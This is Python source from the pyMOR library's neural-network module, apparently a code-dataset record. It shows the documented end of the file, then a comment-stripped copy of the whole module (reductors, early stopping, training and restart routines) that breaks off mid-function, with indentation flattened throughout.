class NeuralNetworkInstationaryStatefreeOutputReductor(NeuralNetworkStatefreeOutputReductor):
"""Output reductor relying on artificial neural networks.
This is a reductor that trains a neural network that approximates
the mapping from parameter space to output space.
Parameters
----------
fom
The full-order |Model| to reduce.
nt
Number of time steps in the reduced order model (does not have to
coincide with the number of time steps in the full order model).
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
validation_loss
The validation loss to reach during training. If `None`, the neural
network with the smallest validation loss is returned.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, nt, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute the training samples (the outputs to the parameters of the training set)."""
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
samples = self._compute_sample(mu)
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
def _compute_sample(self, mu):
"""Transform parameter and corresponding output to |NumPy arrays|.
This function takes care of including the time instances in the inputs.
"""
output_trajectory = self.fom.output(mu)
output_size = output_trajectory.shape[0]
samples = [(mu.with_(t=t), output.flatten())
for t, output in zip(np.linspace(0, self.fom.T, output_size), output_trajectory)]
return samples
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the output dimension
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [self.fom.dim_output, ]
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkInstationaryStatefreeOutputModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class EarlyStoppingScheduler(BasicObject):
"""Class for performing early stopping in training of neural networks.
If the validation loss does not decrease over a certain amount of epochs, the
training should be aborted to avoid overfitting the training data.
This class implements an early stopping scheduler that recommends to stop the
training process if the validation loss did not decrease by at least `delta`
over `patience` epochs.
Parameters
----------
size_training_validation_set
Size of both, training and validation set together.
patience
Number of epochs of non-decreasing validation loss allowed, before early
stopping the training process.
delta
Minimal amount of decrease in the validation loss that is required to reset
the counter of non-decreasing epochs.
"""
def __init__(self, size_training_validation_set, patience=10, delta=0.):
self.__auto_init(locals())
self.best_losses = None
self.best_neural_network = None
self.counter = 0
def __call__(self, losses, neural_network=None):
"""Returns `True` if early stopping of training is suggested.
Parameters
----------
losses
Dictionary of losses on the validation and the training set in
the current epoch.
neural_network
Neural network that produces the current validation loss.
Returns
-------
`True` if early stopping is suggested, `False` otherwise.
"""
if self.best_losses is None:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
elif self.best_losses['val'] - self.delta <= losses['val']:
self.counter += 1
if self.counter >= self.patience:
return True
else:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
self.counter = 0
return False
class CustomDataset(utils.data.Dataset):
"""Class that represents the dataset to use in PyTorch.
Parameters
----------
training_data
Set of training parameters and the respective coefficients of the
solution in the reduced basis.
"""
def __init__(self, training_data):
self.training_data = training_data
def __len__(self):
return len(self.training_data)
def __getitem__(self, idx):
t = self.training_data[idx]
return t
def train_neural_network(training_data, validation_data, neural_network,
training_parameters={}, scaling_parameters={}, log_loss_frequency=0):
"""Training algorithm for artificial neural networks.
Trains a single neural network using the given training and validation data.
Parameters
----------
training_data
Data to use during the training phase. Has to be a list of tuples,
where each tuple consists of two elements that are either
PyTorch-tensors (`torch.DoubleTensor`) or |NumPy arrays| or pyMOR data
structures that have `to_numpy()` implemented.
The first element contains the input data, the second element contains
the target values.
validation_data
Data to use during the validation phase. Has to be a list of tuples,
where each tuple consists of two elements that are either
PyTorch-tensors (`torch.DoubleTensor`) or |NumPy arrays| or pyMOR data
structures that have `to_numpy()` implemented.
The first element contains the input data, the second element contains
the target values.
neural_network
The neural network to train (can also be a pre-trained model).
Has to be a PyTorch-Module.
training_parameters
Dictionary with additional parameters for the training routine like
the type of the optimizer, the (maximum) number of epochs, the batch
size, the learning rate or the loss function to use.
Possible keys are `'optimizer'` (an optimizer from the PyTorch `optim`
package; if not provided, the LBFGS-optimizer is taken as default),
`'epochs'` (an integer that determines the number of epochs to use
for training the neural network (if training is not interrupted
prematurely due to early stopping); if not provided, 1000 is taken as
default value), `'batch_size'` (an integer that determines the number
of samples to pass to the optimizer at once; if not provided, 20 is
taken as default value; not used in the case of the LBFGS-optimizer
since LBFGS does not support mini-batching), `'learning_rate'` (a
positive real number used as the (initial) step size of the optimizer;
if not provided, 1 is taken as default value), `'loss_function'`
(a loss function from PyTorch; if not provided, the MSE loss is taken
as default), `'lr_scheduler'` (a learning rate scheduler from the
PyTorch `optim.lr_scheduler` package; if not provided or `None`,
no learning rate scheduler is used), `'lr_scheduler_params'`
(a dictionary of additional parameters for the learning rate
scheduler), `'es_scheduler_params'` (a dictionary of additional
parameters for the early stopping scheduler), and `'weight_decay'`
(non-negative real number that determines the strenght of the
l2-regularization; if not provided or 0., no regularization is applied).
scaling_parameters
Dict of tensors that determine how to scale inputs before passing them
through the neural network and outputs after obtaining them from the
neural network. If not provided or each entry is `None`, no scaling is
applied. Required keys are `'min_inputs'`, `'max_inputs'`, `'min_targets'`,
and `'max_targets'`.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss. If `0`, no intermediate logging of losses is done.
Returns
-------
best_neural_network
The best trained neural network with respect to validation loss.
losses
The corresponding losses as a dictionary with keys `'full'` (for the
full loss containing the training and the validation average loss),
`'train'` (for the average loss on the training set), and `'val'`
(for the average loss on the validation set).
"""
assert isinstance(neural_network, nn.Module)
assert isinstance(log_loss_frequency, int)
for data in training_data, validation_data:
assert isinstance(data, list)
assert all(isinstance(datum, tuple) and len(datum) == 2 for datum in data)
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
training_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in training_data]
validation_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in validation_data]
optimizer = optim.LBFGS if 'optimizer' not in training_parameters else training_parameters['optimizer']
epochs = 1000 if 'epochs' not in training_parameters else training_parameters['epochs']
assert isinstance(epochs, int) and epochs > 0
batch_size = 20 if 'batch_size' not in training_parameters else training_parameters['batch_size']
assert isinstance(batch_size, int) and batch_size > 0
learning_rate = 1. if 'learning_rate' not in training_parameters else training_parameters['learning_rate']
assert learning_rate > 0.
loss_function = (nn.MSELoss() if (training_parameters.get('loss_function') is None)
else training_parameters['loss_function'])
logger = getLogger('pymor.algorithms.neural_network.train_neural_network')
# LBFGS-optimizer does not support mini-batching, so the batch size needs to be adjusted
if optimizer == optim.LBFGS:
batch_size = max(len(training_data), len(validation_data))
# initialize optimizer, early stopping scheduler and learning rate scheduler
weight_decay = training_parameters.get('weight_decay', 0.)
assert weight_decay >= 0.
if weight_decay > 0. and 'weight_decay' not in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
logger.warning(f"Optimizer {optimizer.__class__.__name__} does not support weight decay! "
"Continuing without regularization!")
elif 'weight_decay' in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate,
weight_decay=weight_decay)
else:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
if 'es_scheduler_params' in training_parameters:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data),
**training_parameters['es_scheduler_params'])
else:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data))
if training_parameters.get('lr_scheduler'):
lr_scheduler = training_parameters['lr_scheduler'](optimizer, **training_parameters['lr_scheduler_params'])
# create the training and validation sets as well as the respective data loaders
training_dataset = CustomDataset(training_data)
validation_dataset = CustomDataset(validation_data)
training_loader = utils.data.DataLoader(training_dataset, batch_size=batch_size)
validation_loader = utils.data.DataLoader(validation_dataset, batch_size=batch_size)
dataloaders = {'train': training_loader, 'val': validation_loader}
phases = ['train', 'val']
logger.info('Starting optimization procedure ...')
if 'min_inputs' in scaling_parameters and 'max_inputs' in scaling_parameters:
min_inputs = scaling_parameters['min_inputs']
max_inputs = scaling_parameters['max_inputs']
else:
min_inputs = None
max_inputs = None
if 'min_targets' in scaling_parameters and 'max_targets' in scaling_parameters:
min_targets = scaling_parameters['min_targets']
max_targets = scaling_parameters['max_targets']
else:
min_targets = None
max_targets = None
# perform optimization procedure
for epoch in range(epochs):
losses = {'full': 0.}
# alternate between training and validation phase
for phase in phases:
if phase == 'train':
neural_network.train()
else:
neural_network.eval()
running_loss = 0.0
# iterate over batches
for batch in dataloaders[phase]:
# scale inputs and outputs if desired
if min_inputs is not None and max_inputs is not None:
inputs = (batch[0] - min_inputs) / (max_inputs - min_inputs)
else:
inputs = batch[0]
if min_targets is not None and max_targets is not None:
targets = (batch[1] - min_targets) / (max_targets - min_targets)
else:
targets = batch[1]
with torch.set_grad_enabled(phase == 'train'):
def closure():
if torch.is_grad_enabled():
optimizer.zero_grad()
outputs = neural_network(inputs)
loss = loss_function(outputs, targets)
if loss.requires_grad:
loss.backward()
return loss
# perform optimization step
if phase == 'train':
optimizer.step(closure)
# compute loss of current batch
loss = closure()
# update overall absolute loss
running_loss += loss.item() * len(batch[0])
# compute average loss
epoch_loss = running_loss / len(dataloaders[phase].dataset)
losses[phase] = epoch_loss
losses['full'] += running_loss
if log_loss_frequency > 0 and epoch % log_loss_frequency == 0:
logger.info(f'Epoch {epoch}: Current {phase} loss of {losses[phase]:.3e}')
if 'lr_scheduler' in training_parameters and training_parameters['lr_scheduler']:
lr_scheduler.step()
# check for early stopping
if phase == 'val' and es_scheduler(losses, neural_network):
logger.info(f'Stopping training process early after {epoch + 1} epochs with validation loss '
f'of {es_scheduler.best_losses["val"]:.3e} ...')
return es_scheduler.best_neural_network, es_scheduler.best_losses
return es_scheduler.best_neural_network, es_scheduler.best_losses
def multiple_restarts_training(training_data, validation_data, neural_network,
target_loss=None, max_restarts=10, log_loss_frequency=0,
training_parameters={}, scaling_parameters={}, seed=None):
"""Algorithm that performs multiple restarts of neural network training.
This method either performs a predefined number of restarts and returns
the best trained network or tries to reach a given target loss and
stops training when the target loss is reached.
See :func:`train_neural_network` for more information on the parameters.
Parameters
----------
training_data
Data to use during the training phase.
validation_data
Data to use during the validation phase.
neural_network
The neural network to train (parameters will be reset after each
restart).
target_loss
Loss to reach during training (if `None`, the network with the
smallest loss is returned).
max_restarts
Maximum number of restarts to perform.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss. If `0`, no intermediate logging of losses is done.
training_parameters
Additional parameters for the training algorithm,
see :func:`train_neural_network` for more information.
scaling_parameters
Additional parameters for scaling inputs respectively outputs,
see :func:`train_neural_network` for more information.
seed
Seed to use for various functions in PyTorch. Using a fixed seed,
it is possible to reproduce former results.
Returns
-------
best_neural_network
The best trained neural network.
losses
The corresponding losses.
Raises
------
NeuralNetworkTrainingFailed
Raised if prescribed loss can not be reached within the given number
of restarts.
"""
assert isinstance(training_parameters, dict)
assert isinstance(max_restarts, int) and max_restarts > 0
logger = getLogger('pymor.algorithms.neural_network.multiple_restarts_training')
# if applicable, set a common seed for the PyTorch initialization
# of weights and biases and further PyTorch methods for all training runs
if seed:
torch.manual_seed(seed)
# in case no training data is provided, return a neural network
# that always returns zeros independent of the input
if len(training_data) == 0 or len(training_data[0]) == 0:
for layers in neural_network.children():
for layer in layers:
torch.nn.init.zeros_(layer.weight)
layer.bias.data.fill_(0.)
return neural_network, {'full': None, 'train': None, 'val': None}
if target_loss:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
f'to train a neural network with a loss below {target_loss:.3e} ...')
else:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
'to find the neural network with the lowest loss ...')
with logger.block('Training neural network #0 ...'):
best_neural_network, losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
# perform multiple restarts
for run in range(1, max_restarts + 1):
if target_loss and losses['full'] <= target_loss:
logger.info(f'Finished training after {run - 1} restart{"s" if run - 1 != 1 else ""}, '
f'found neural network with loss of {losses["full"]:.3e} ...')
return neural_network, losses
with logger.block(f'Training neural network #{run} ...'):
# reset parameters of layers to start training with a new and untrained network
for layers in neural_network.children():
for layer in layers:
if hasattr(layer, 'reset_parameters'):
layer.reset_parameters()
# perform training
current_nn, current_losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
if current_losses['full'] < losses['full']:
logger.info(f'Found better neural network (loss of {current_losses["full"]:.3e} '
f'instead of {losses["full"]:.3e}) ...')
best_neural_network = current_nn
losses = current_losses
else:
logger.info(f'Rejecting neural network with loss of {current_losses["full"]:.3e} '
f'(instead of {losses["full"]:.3e}) ...')
if target_loss:
raise NeuralNetworkTrainingFailed(f'Could not find neural network with prescribed loss of '
f'{target_loss:.3e} (best one found was {losses["full"]:.3e})!')
logger.info(f'Found neural network with error of {losses["full"]:.3e} ...')
return best_neural_network, losses
| 46.598492
| 115
| 0.633806
|
from pymor.core.config import config
config.require('TORCH')
from numbers import Number
import inspect
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils as utils
from pymor.algorithms.pod import pod
from pymor.algorithms.projection import project
from pymor.core.base import BasicObject
from pymor.core.exceptions import NeuralNetworkTrainingFailed
from pymor.core.logger import getLogger
from pymor.models.neural_network import (FullyConnectedNN, NeuralNetworkModel,
NeuralNetworkStatefreeOutputModel,
NeuralNetworkInstationaryModel,
NeuralNetworkInstationaryStatefreeOutputModel)
class NeuralNetworkReductor(BasicObject):
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def reduce(self, hidden_layers='[(N+P)*3, (N+P)*3]', activation_function=torch.tanh,
optimizer=optim.LBFGS, epochs=1000, batch_size=20, learning_rate=1.,
loss_function=None, restarts=10, lr_scheduler=optim.lr_scheduler.StepLR,
lr_scheduler_params={'step_size': 10, 'gamma': 0.7},
es_scheduler_params={'patience': 10, 'delta': 0.}, weight_decay=0.,
log_loss_frequency=0, seed=0):
assert restarts > 0
assert epochs > 0
assert batch_size > 0
assert learning_rate > 0.
assert weight_decay >= 0.
torch.manual_seed(seed)
if not hasattr(self, 'training_data'):
self.compute_training_data()
layer_sizes = self._compute_layer_sizes(hidden_layers)
if not hasattr(self, 'validation_data'):
with self.logger.block('Computing validation snapshots ...'):
if self.validation_set:
self.validation_data = []
for mu in self.validation_set:
sample = self._compute_sample(mu)
self.validation_data.extend(sample)
else:
number_validation_snapshots = int(len(self.training_data)*self.validation_ratio)
np.random.shuffle(self.training_data)
self.validation_data = self.training_data[0:number_validation_snapshots]
self.training_data = self.training_data[number_validation_snapshots+1:]
with self.logger.block('Training of neural network ...'):
target_loss = self._compute_target_loss()
neural_network_parameters = {'layer_sizes': layer_sizes,
'activation_function': activation_function}
if loss_function == 'weighted MSE':
if hasattr(self, 'weights'):
weights = self.weights
def weighted_mse_loss_function(inputs, targets):
return (weights * (inputs - targets) ** 2).mean()
loss_function = weighted_mse_loss_function
self.logger.info('Using weighted MSE loss function ...')
else:
raise RuntimeError('No weights for weighted MSE loss available!')
training_parameters = {'optimizer': optimizer, 'epochs': epochs,
'batch_size': batch_size, 'learning_rate': learning_rate,
'lr_scheduler': lr_scheduler, 'lr_scheduler_params': lr_scheduler_params,
'es_scheduler_params': es_scheduler_params, 'weight_decay': weight_decay,
'loss_function': loss_function}
self.logger.info('Initializing neural network ...')
neural_network = FullyConnectedNN(**neural_network_parameters).double()
self.neural_network, self.losses = multiple_restarts_training(self.training_data, self.validation_data,
neural_network, target_loss, restarts,
log_loss_frequency, training_parameters,
self.scaling_parameters, seed)
self._check_tolerances()
return self._build_rom()
def compute_training_data(self):
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
U.append(self.fom.solve(mu))
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu, u in zip(self.training_set, U):
sample = self._compute_sample(mu, u)
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
self.weights = torch.Tensor(svals)
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _update_scaling_parameters(self, sample):
assert len(sample) == 2 or (len(sample) == 1 and len(sample[0]) == 2)
if len(sample) == 1:
sample = sample[0]
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
sample = (torch.DoubleTensor(prepare_datum(sample[0])), torch.DoubleTensor(prepare_datum(sample[1])))
if self.scale_inputs:
if self.scaling_parameters['min_inputs'] is not None:
self.scaling_parameters['min_inputs'] = torch.min(self.scaling_parameters['min_inputs'], sample[0])
else:
self.scaling_parameters['min_inputs'] = sample[0]
if self.scaling_parameters['max_inputs'] is not None:
self.scaling_parameters['max_inputs'] = torch.max(self.scaling_parameters['max_inputs'], sample[0])
else:
self.scaling_parameters['max_inputs'] = sample[0]
if self.scale_outputs:
if self.scaling_parameters['min_targets'] is not None:
self.scaling_parameters['min_targets'] = torch.min(self.scaling_parameters['min_targets'],
sample[1])
else:
self.scaling_parameters['min_targets'] = sample[1]
if self.scaling_parameters['max_targets'] is not None:
self.scaling_parameters['max_targets'] = torch.max(self.scaling_parameters['max_targets'],
sample[1])
else:
self.scaling_parameters['max_targets'] = sample[1]
def _compute_sample(self, mu, u=None):
if u is None:
u = self.fom.solve(mu)
product = self.pod_params.get('product')
return [(mu, self.reduced_basis.inner(u, product=product)[:, 0])]
def _compute_layer_sizes(self, hidden_layers):
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [len(self.reduced_basis), ]
def _compute_target_loss(self):
target_loss = None
if isinstance(self.ann_mse, Number):
target_loss = self.ann_mse
elif self.ann_mse == 'like_basis':
target_loss = self.mse_basis
return target_loss
def _check_tolerances(self):
with self.logger.block('Checking tolerances for error of neural network ...'):
if isinstance(self.ann_mse, Number):
if self.losses['full'] > self.ann_mse:
raise NeuralNetworkTrainingFailed('Could not train a neural network that '
'guarantees prescribed tolerance!')
elif self.ann_mse == 'like_basis':
if self.losses['full'] > self.mse_basis:
raise NeuralNetworkTrainingFailed('Could not train a neural network with an error as small as '
'the reduced basis error! Maybe you can try a different '
'neural network architecture or change the value of '
'`ann_mse`.')
elif self.ann_mse is None:
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
else:
raise ValueError('Unknown value for mean squared error of neural network')
def _build_rom(self):
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
def reconstruct(self, u):
assert hasattr(self, 'reduced_basis')
return self.reduced_basis.lincomb(u.to_numpy())
class NeuralNetworkStatefreeOutputReductor(NeuralNetworkReductor):
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
sample = self._compute_sample(mu)
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
def _compute_sample(self, mu):
return [(mu, self.fom.output(mu).flatten())]
def _compute_layer_sizes(self, hidden_layers):
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [self.fom.dim_output, ]
def _compute_target_loss(self):
return self.validation_loss
def _check_tolerances(self):
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
def _build_rom(self):
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkStatefreeOutputModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class NeuralNetworkInstationaryReductor(NeuralNetworkReductor):
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
u = self.fom.solve(mu)
if hasattr(self, 'nt'):
assert self.nt == len(u)
else:
self.nt = len(u)
U.append(u)
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
with self.logger.block('Computing training samples ...'):
self.training_data = []
for i, mu in enumerate(self.training_set):
samples = self._compute_sample(mu, U[i*self.nt:(i+1)*self.nt])
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
self.weights = torch.Tensor(svals)
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _compute_sample(self, mu, u=None):
if u is None:
u = self.fom.solve(mu)
parameters_with_time = [mu.with_(t=t) for t in np.linspace(0, self.fom.T, self.nt)]
product = self.pod_params.get('product')
samples = [(mu, self.reduced_basis.inner(u_t, product=product)[:, 0])
for mu, u_t in zip(parameters_with_time, u)]
return samples
def _compute_layer_sizes(self, hidden_layers):
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [len(self.reduced_basis), ]
def _build_rom(self):
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkInstationaryModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
class NeuralNetworkInstationaryStatefreeOutputReductor(NeuralNetworkStatefreeOutputReductor):
def __init__(self, fom, nt, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
samples = self._compute_sample(mu)
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
def _compute_sample(self, mu):
output_trajectory = self.fom.output(mu)
output_size = output_trajectory.shape[0]
samples = [(mu.with_(t=t), output.flatten())
for t, output in zip(np.linspace(0, self.fom.T, output_size), output_trajectory)]
return samples
def _compute_layer_sizes(self, hidden_layers):
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [self.fom.dim_output, ]
def _build_rom(self):
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkInstationaryStatefreeOutputModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class EarlyStoppingScheduler(BasicObject):
def __init__(self, size_training_validation_set, patience=10, delta=0.):
self.__auto_init(locals())
self.best_losses = None
self.best_neural_network = None
self.counter = 0
def __call__(self, losses, neural_network=None):
if self.best_losses is None:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
elif self.best_losses['val'] - self.delta <= losses['val']:
self.counter += 1
if self.counter >= self.patience:
return True
else:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
self.counter = 0
return False
class CustomDataset(utils.data.Dataset):
def __init__(self, training_data):
self.training_data = training_data
def __len__(self):
return len(self.training_data)
def __getitem__(self, idx):
t = self.training_data[idx]
return t
def train_neural_network(training_data, validation_data, neural_network,
training_parameters={}, scaling_parameters={}, log_loss_frequency=0):
assert isinstance(neural_network, nn.Module)
assert isinstance(log_loss_frequency, int)
for data in training_data, validation_data:
assert isinstance(data, list)
assert all(isinstance(datum, tuple) and len(datum) == 2 for datum in data)
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
training_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in training_data]
validation_data = [(prepare_datum(datum[0]), prepare_datum(datum[1])) for datum in validation_data]
optimizer = optim.LBFGS if 'optimizer' not in training_parameters else training_parameters['optimizer']
epochs = 1000 if 'epochs' not in training_parameters else training_parameters['epochs']
assert isinstance(epochs, int) and epochs > 0
batch_size = 20 if 'batch_size' not in training_parameters else training_parameters['batch_size']
assert isinstance(batch_size, int) and batch_size > 0
learning_rate = 1. if 'learning_rate' not in training_parameters else training_parameters['learning_rate']
assert learning_rate > 0.
loss_function = (nn.MSELoss() if (training_parameters.get('loss_function') is None)
else training_parameters['loss_function'])
logger = getLogger('pymor.algorithms.neural_network.train_neural_network')
if optimizer == optim.LBFGS:
batch_size = max(len(training_data), len(validation_data))
weight_decay = training_parameters.get('weight_decay', 0.)
assert weight_decay >= 0.
if weight_decay > 0. and 'weight_decay' not in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
logger.warning(f"Optimizer {optimizer.__class__.__name__} does not support weight decay! "
"Continuing without regularization!")
elif 'weight_decay' in inspect.getfullargspec(optimizer).args:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate,
weight_decay=weight_decay)
else:
optimizer = optimizer(neural_network.parameters(), lr=learning_rate)
if 'es_scheduler_params' in training_parameters:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data),
**training_parameters['es_scheduler_params'])
else:
es_scheduler = EarlyStoppingScheduler(len(training_data) + len(validation_data))
if training_parameters.get('lr_scheduler'):
lr_scheduler = training_parameters['lr_scheduler'](optimizer, **training_parameters['lr_scheduler_params'])
training_dataset = CustomDataset(training_data)
validation_dataset = CustomDataset(validation_data)
training_loader = utils.data.DataLoader(training_dataset, batch_size=batch_size)
validation_loader = utils.data.DataLoader(validation_dataset, batch_size=batch_size)
dataloaders = {'train': training_loader, 'val': validation_loader}
phases = ['train', 'val']
logger.info('Starting optimization procedure ...')
if 'min_inputs' in scaling_parameters and 'max_inputs' in scaling_parameters:
min_inputs = scaling_parameters['min_inputs']
max_inputs = scaling_parameters['max_inputs']
else:
min_inputs = None
max_inputs = None
if 'min_targets' in scaling_parameters and 'max_targets' in scaling_parameters:
min_targets = scaling_parameters['min_targets']
max_targets = scaling_parameters['max_targets']
else:
min_targets = None
max_targets = None
for epoch in range(epochs):
losses = {'full': 0.}
for phase in phases:
if phase == 'train':
neural_network.train()
else:
neural_network.eval()
running_loss = 0.0
for batch in dataloaders[phase]:
if min_inputs is not None and max_inputs is not None:
inputs = (batch[0] - min_inputs) / (max_inputs - min_inputs)
else:
inputs = batch[0]
if min_targets is not None and max_targets is not None:
targets = (batch[1] - min_targets) / (max_targets - min_targets)
else:
targets = batch[1]
with torch.set_grad_enabled(phase == 'train'):
def closure():
if torch.is_grad_enabled():
optimizer.zero_grad()
outputs = neural_network(inputs)
loss = loss_function(outputs, targets)
if loss.requires_grad:
loss.backward()
return loss
if phase == 'train':
optimizer.step(closure)
loss = closure()
running_loss += loss.item() * len(batch[0])
epoch_loss = running_loss / len(dataloaders[phase].dataset)
losses[phase] = epoch_loss
losses['full'] += running_loss
if log_loss_frequency > 0 and epoch % log_loss_frequency == 0:
logger.info(f'Epoch {epoch}: Current {phase} loss of {losses[phase]:.3e}')
if 'lr_scheduler' in training_parameters and training_parameters['lr_scheduler']:
lr_scheduler.step()
if phase == 'val' and es_scheduler(losses, neural_network):
logger.info(f'Stopping training process early after {epoch + 1} epochs with validation loss '
f'of {es_scheduler.best_losses["val"]:.3e} ...')
